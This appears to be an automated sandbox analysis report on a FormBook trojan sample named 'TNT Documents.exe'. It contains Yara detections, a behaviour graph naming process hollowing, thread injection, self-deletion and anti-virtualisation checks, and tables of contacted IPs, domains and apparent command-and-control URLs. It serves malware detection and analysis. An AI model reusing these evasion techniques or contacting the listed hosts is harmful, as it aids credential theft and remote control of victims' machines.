Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532859 Sample: TNT Documents.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 33 www.viavelleiloes.online 2->33 35 www.projectcentered.com 2->35 37 5 other IPs or domains 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 11 other signatures 2->51 11 TNT Documents.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\...\TNT Documents.exe.log, ASCII 11->31 dropped 63 Injects a PE file into a foreign processes 11->63 15 TNT Documents.exe 11->15         started        18 TNT Documents.exe 11->18         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 20 explorer.exe 15->20 injected process9 dnsIp10 39 metronixmedical.com 119.18.54.99, 49820, 80 PUBLIC-DOMAIN-REGISTRYUS India 20->39 41 cortepuroiberico.com 51.255.30.106, 49794, 80 OVHFR France 20->41 43 5 other IPs or domains 20->43 53 System process connects to network (likely due to code injection or exploit) 20->53 24 mstsc.exe 20->24         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 24->55 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
119.18.54.99
 metronixmedical.com India
394695 PUBLIC-DOMAIN-REGISTRYUS true
34.102.136.180
 coached.info United States
15169 GOOGLEUS false
51.255.30.106
 cortepuroiberico.com France
16276 OVHFR true
209.17.116.163
 www.specialtyplastics.online United States
55002 DEFENSE-NETUS true

Contacted Domains

Name IP Active
metronixmedical.com 119.18.54.99 true
www.functionalsoft.com 74.208.236.210 true
coached.info 34.102.136.180 true
cortepuroiberico.com 51.255.30.106 true
www.specialtyplastics.online 209.17.116.163 true
projectcentered.com 158.69.116.156 true
www.pirosconsulting.com unknown unknown
www.metronixmedical.com unknown unknown
www.pentagonpublishers.com unknown unknown
www.floridanratraining.com unknown unknown
www.viavelleiloes.online unknown unknown
www.cortepuroiberico.com unknown unknown
www.coached.info unknown unknown
www.projectcentered.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd false
  • Avira URL Cloud: safe
 unknown
www.floridanratraining.com/how6/ true
  • Avira URL Cloud: safe
 low
http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd true
  • Avira URL Cloud: safe
 unknown
http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd true
  • Avira URL Cloud: malware
 unknown
http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd true
  • Avira URL Cloud: malware
 unknown